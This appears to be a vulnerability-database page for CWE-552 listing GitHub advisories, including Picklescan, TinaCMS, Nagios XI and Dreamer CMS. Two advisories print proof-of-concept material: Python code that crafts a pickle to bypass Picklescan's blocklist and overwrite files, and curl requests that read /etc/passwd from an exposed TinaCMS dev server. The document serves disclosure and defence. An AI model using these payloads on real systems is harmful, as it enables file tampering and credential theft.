CWE-552
AllowedFiles or Directories Accessible to External Parties
Abstraction: Base · Status: Draft
The product makes files or directories accessible to unauthorized actors, even though they should not be.
670 vulnerabilities reference this CWE, most recent first.
GHSA-M273-6V24-X4M4
Vulnerability from github – Published: 2025-12-29 15:22 – Updated: 2026-06-18 14:44Summary
Picklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files.
Details
This is another vulnerability which impacts the downstream user.
By constructing a pickle that user distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.
PoC
import pickle
import distutils.file_util
class FileWriteBypass:
def __reduce__(self):
target_file = "pwned_config.env"
content = ["print('I have overwritten your config')"]
return (distutils.file_util.write_file, (target_file, content))
payload = pickle.dumps(FileWriteBypass())
with open("bypass_filewrite.pkl", "wb") as f:
f.write(payload)
print("bypass_filewrite.pkl")
To fix this just add disutil to the blacklist
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "picklescan"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.33"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-71321"
],
"database_specific": {
"cwe_ids": [
"CWE-502",
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-29T15:22:30Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nPicklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files.\n\n### Details\nThis is another vulnerability which impacts the downstream user.\n\nBy constructing a pickle that user distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.\n\n### PoC\n```python\nimport pickle\nimport distutils.file_util\n\nclass FileWriteBypass:\n def __reduce__(self):\n \n target_file = \"pwned_config.env\"\n content = [\"print(\u0027I have overwritten your config\u0027)\"]\n \n return (distutils.file_util.write_file, (target_file, content))\n\npayload = pickle.dumps(FileWriteBypass())\nwith open(\"bypass_filewrite.pkl\", \"wb\") as f:\n f.write(payload)\n\nprint(\"bypass_filewrite.pkl\")\n```\n\n\u003cimg width=\"853\" height=\"197\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a129f5aa-a050-4e88-adb7-5a6f93e35b65\" /\u003e\n\nTo fix this just add disutil to the blacklist",
"id": "GHSA-m273-6v24-x4m4",
"modified": "2026-06-18T14:44:27Z",
"published": "2025-12-29T15:22:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m273-6v24-x4m4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71321"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/pull/53"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab"
},
{
"type": "PACKAGE",
"url": "https://github.com/mmaitre314/picklescan"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-file-writing-via-distutils-module-bypass"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Picklescan vulnerable to Arbitrary File Writing"
}
GHSA-M2MX-4JC6-3WH7
Vulnerability from github – Published: 2022-05-13 01:08 – Updated: 2022-05-13 01:08The VFS subsystem in the Linux kernel 3.x provides an incomplete set of requirements for setattr operations that underspecifies removing extended privilege attributes, which allows local users to cause a denial of service (capability stripping) via a failed invocation of a system call, as demonstrated by using chown to remove a capability from the ping or Wireshark dumpcap program.
{
"affected": [],
"aliases": [
"CVE-2015-1350"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-05-02T10:59:00Z",
"severity": "MODERATE"
},
"details": "The VFS subsystem in the Linux kernel 3.x provides an incomplete set of requirements for setattr operations that underspecifies removing extended privilege attributes, which allows local users to cause a denial of service (capability stripping) via a failed invocation of a system call, as demonstrated by using chown to remove a capability from the ping or Wireshark dumpcap program.",
"id": "GHSA-m2mx-4jc6-3wh7",
"modified": "2022-05-13T01:08:47Z",
"published": "2022-05-13T01:08:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1350"
},
{
"type": "WEB",
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770492"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1185139"
},
{
"type": "WEB",
"url": "http://marc.info/?l=linux-kernel\u0026m=142153722930533\u0026w=2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2015/01/24/5"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/76075"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M3F3-PC2W-56JQ
Vulnerability from github – Published: 2023-09-27 15:30 – Updated: 2024-04-04 07:54Dreamer CMS v4.1.3 was discovered to contain an arbitrary file read vulnerability via the component /admin/TemplateController.java.
{
"affected": [],
"aliases": [
"CVE-2023-43856"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-27T15:19:34Z",
"severity": "HIGH"
},
"details": "Dreamer CMS v4.1.3 was discovered to contain an arbitrary file read vulnerability via the component /admin/TemplateController.java.",
"id": "GHSA-m3f3-pc2w-56jq",
"modified": "2024-04-04T07:54:57Z",
"published": "2023-09-27T15:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43856"
},
{
"type": "WEB",
"url": "https://github.com/yux1azhengye"
},
{
"type": "WEB",
"url": "https://github.com/yux1azhengye/mycve/blob/main/DreamerCMS%20arbitrary%20file%20reading.pdf"
},
{
"type": "WEB",
"url": "http://cms.iteachyou.cc"
},
{
"type": "WEB",
"url": "http://dreamer.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-M3X3-92M3-68HJ
Vulnerability from github – Published: 2022-10-14 19:00 – Updated: 2022-10-17 19:00There is a file inclusion vulnerability in the template management module in UCMS 1.6
{
"affected": [],
"aliases": [
"CVE-2022-42234"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-10-14T17:15:00Z",
"severity": "HIGH"
},
"details": "There is a file inclusion vulnerability in the template management module in UCMS 1.6",
"id": "GHSA-m3x3-92m3-68hj",
"modified": "2022-10-17T19:00:25Z",
"published": "2022-10-14T19:00:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42234"
},
{
"type": "WEB",
"url": "https://github.com/luoyangchangan/bug/issues/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M48G-4WR2-J2H6
Vulnerability from github – Published: 2026-03-12 20:32 – Updated: 2026-03-12 20:32Summary
The TinaCMS CLI dev server configures Vite with server.fs.strict: false, which disables Vite's built-in filesystem access restriction. This allows any unauthenticated attacker who can reach the dev server to read arbitrary files on the host system
Details
When running tinacms dev, the CLI starts a Vite dev server configured in:
packages/@tinacms/cli/src/next/vite/index.ts
server: {
host: configManager.config?.build?.host ?? false,
...
fs: {
strict: false, // Disables Vite's filesystem access restriction
},
},
TinaCMS middleware only intercepts specific route prefixes (/media/*, /graphql, /altair, /searchIndex). Any request to a path outside these routes falls through to Vite's default static file handler, which will serve the file directly from the absolute path on the filesystem. Additionally, the server enables permissive CORS (cors() with no origin restriction), which may further facilitate browser-based exploitation such as DNS rebinding attacks.
PoC
Prerequisites: TinaCMS CLI dev server running (default port 4001).
- Read system files directly:
curl http://localhost:4001/etc/passwd
curl http://localhost:4001/etc/hostname
Vite resolves and serves the absolute path directly from the filesystem.
Impact
Any developer running tinacms dev in an environment where the dev server port is reachable by an attacker. This includes:
-
Cloud IDEs (GitHub Codespaces, Gitpod) where ports are automatically forwarded and publicly accessible
-
Docker or VM setups with port forwarding configured
-
Misconfigured environments binding to 0.0.0.0 via the build.host config option
-
Systems targeted via DNS rebinding attacks, leveraging the unrestricted CORS policy
-
Local environments with malicious dependencies running on the same machine
An attacker who can reach port 4001 can:
-
Read any file readable by the server process (/etc/passwd, /etc/shadow, SSH private keys)
-
Exfiltrate environment variables and secrets via /proc/self/environ
-
Access cloud credentials and API keys from configuration files
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@tinacms/cli"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-29066"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-12T20:32:43Z",
"nvd_published_at": "2026-03-12T17:16:50Z",
"severity": "MODERATE"
},
"details": "## Summary\nThe TinaCMS CLI dev server configures Vite with `server.fs.strict: false`, which disables Vite\u0027s built-in filesystem access restriction. This allows any unauthenticated attacker who can reach the dev server to read arbitrary files on the host system\n\n## Details\nWhen running `tinacms dev`, the CLI starts a Vite dev server configured in:\n`packages/@tinacms/cli/src/next/vite/index.ts`\n```\nserver: {\n host: configManager.config?.build?.host ?? false,\n ...\n fs: {\n strict: false, // Disables Vite\u0027s filesystem access restriction\n },\n},\n```\nTinaCMS middleware only intercepts specific route prefixes (/media/*, /graphql, /altair, /searchIndex). Any request to a path outside these routes falls through to Vite\u0027s default static file handler, which will serve the file directly from the absolute path on the filesystem.\nAdditionally, the server enables permissive CORS (cors() with no origin restriction), which may further facilitate browser-based exploitation such as DNS rebinding attacks.\n\n## PoC\n\n**Prerequisites**: TinaCMS CLI dev server running (default port 4001).\n\n- Read system files directly:\n```\ncurl http://localhost:4001/etc/passwd\n```\n\u003cimg width=\"705\" height=\"332\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6fd0e1c7-a549-40c8-bc81-af9c343f52a0\" /\u003e\n\n```\ncurl http://localhost:4001/etc/hostname\n```\n\u003cimg width=\"631\" height=\"41\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bd103dc3-d4c3-4774-8007-b55de3fc2a9e\" /\u003e\nVite resolves and serves the absolute path directly from the filesystem.\n\n\n## Impact\nAny developer running tinacms dev in an environment where the dev server port is reachable by an attacker. This includes:\n\n- Cloud IDEs (GitHub Codespaces, Gitpod) where ports are automatically forwarded and publicly accessible\n\n- Docker or VM setups with port forwarding configured\n\n- Misconfigured environments binding to 0.0.0.0 via the build.host config option\n\n- Systems targeted via DNS rebinding attacks, leveraging the unrestricted CORS policy\n\n- Local environments with malicious dependencies running on the same machine\n\nAn attacker who can reach port 4001 can:\n\n- Read any file readable by the server process (/etc/passwd, /etc/shadow, SSH private keys)\n\n- Exfiltrate environment variables and secrets via /proc/self/environ\n\n- Access cloud credentials and API keys from configuration files",
"id": "GHSA-m48g-4wr2-j2h6",
"modified": "2026-03-12T20:32:43Z",
"published": "2026-03-12T20:32:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-m48g-4wr2-j2h6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29066"
},
{
"type": "PACKAGE",
"url": "https://github.com/tinacms/tinacms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "TinaCMS CLI has Arbitrary File Read via Disabled Vite Filesystem Restriction"
}
GHSA-M4XJ-RMH7-H46M
Vulnerability from github – Published: 2022-05-24 19:11 – Updated: 2022-05-24 19:11Nagios XI before version 5.8.5 is vulnerable to local file inclusion through improper limitation of a pathname in index.php.
{
"affected": [],
"aliases": [
"CVE-2021-37348"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-08-13T12:15:00Z",
"severity": "HIGH"
},
"details": "Nagios XI before version 5.8.5 is vulnerable to local file inclusion through improper limitation of a pathname in index.php.",
"id": "GHSA-m4xj-rmh7-h46m",
"modified": "2022-05-24T19:11:08Z",
"published": "2022-05-24T19:11:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37348"
},
{
"type": "WEB",
"url": "https://www.nagios.com/downloads/nagios-xi/change-log"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-M54Q-G6PW-5JV7
Vulnerability from github – Published: 2022-05-13 01:42 – Updated: 2022-05-13 01:42Tenshi 0.15 creates a tenshi.pid file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for tenshi.pid modification before a root script executes a "kill cat /pathname/tenshi.pid" command.
{
"affected": [],
"aliases": [
"CVE-2017-11746"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-07-30T16:29:00Z",
"severity": "HIGH"
},
"details": "Tenshi 0.15 creates a tenshi.pid file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for tenshi.pid modification before a root script executes a \"kill `cat /pathname/tenshi.pid`\" command.",
"id": "GHSA-m54q-g6pw-5jv7",
"modified": "2022-05-13T01:42:29Z",
"published": "2022-05-13T01:42:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11746"
},
{
"type": "WEB",
"url": "https://github.com/inversepath/tenshi/issues/6"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201804-18"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M5XF-MWC4-9WPV
Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2022-08-06 00:00It has been discovered that redhat-certification is not properly configured and it lists all files and directories in the /var/www/rhcert/store/transfer directory through the /rhcert-transfer URL. An unauthorized attacker may use this flaw to gather sensible information. This flaw affects redhat-certification version 7.
{
"affected": [],
"aliases": [
"CVE-2018-10863"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-05-26T19:15:00Z",
"severity": "HIGH"
},
"details": "It has been discovered that redhat-certification is not properly configured and it lists all files and directories in the /var/www/rhcert/store/transfer directory through the /rhcert-transfer URL. An unauthorized attacker may use this flaw to gather sensible information. This flaw affects redhat-certification version 7.",
"id": "GHSA-m5xf-mwc4-9wpv",
"modified": "2022-08-06T00:00:44Z",
"published": "2022-05-24T19:03:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10863"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2018-10863"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1594122"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-M7Q8-MVMC-97P3
Vulnerability from github – Published: 2026-05-12 18:30 – Updated: 2026-05-12 18:30Files or directories accessible to external parties in Microsoft Office Word allows an unauthorized attacker to disclose information locally.
{
"affected": [],
"aliases": [
"CVE-2026-35440"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-12T18:17:14Z",
"severity": "MODERATE"
},
"details": "Files or directories accessible to external parties in Microsoft Office Word allows an unauthorized attacker to disclose information locally.",
"id": "GHSA-m7q8-mvmc-97p3",
"modified": "2026-05-12T18:30:44Z",
"published": "2026-05-12T18:30:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35440"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35440"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-M8GQ-83GH-V42V
Vulnerability from github – Published: 2022-03-16 00:00 – Updated: 2022-03-18 23:52CVRF-CSAF-Converter before 1.0.0-rc2 resolves XML External Entities (XXE). This leads to the inclusion of arbitrary (local) file content into the generated output document. An attacker can exploit this to disclose information from the system running the converter.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.0.0rc1"
},
"package": {
"ecosystem": "PyPI",
"name": "cvrf2csaf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.0rc2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-27193"
],
"database_specific": {
"cwe_ids": [
"CWE-552",
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2022-03-18T23:52:30Z",
"nvd_published_at": "2022-03-15T05:15:00Z",
"severity": "MODERATE"
},
"details": "CVRF-CSAF-Converter before 1.0.0-rc2 resolves XML External Entities (XXE). This leads to the inclusion of arbitrary (local) file content into the generated output document. An attacker can exploit this to disclose information from the system running the converter.",
"id": "GHSA-m8gq-83gh-v42v",
"modified": "2022-03-18T23:52:30Z",
"published": "2022-03-16T00:00:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27193"
},
{
"type": "PACKAGE",
"url": "https://github.com/csaf-tools/CVRF-CSAF-Converter"
},
{
"type": "WEB",
"url": "https://github.com/csaf-tools/CVRF-CSAF-Converter/releases/tag/1.0.0-rc2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "XML External Entities Vulnerability in CVRF-CSAF-Converter"
}
Mitigation
When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to disable public access.
CAPEC-150: Collect Data from Common Resource Locations
An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.
CAPEC-639: Probe System Files
An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.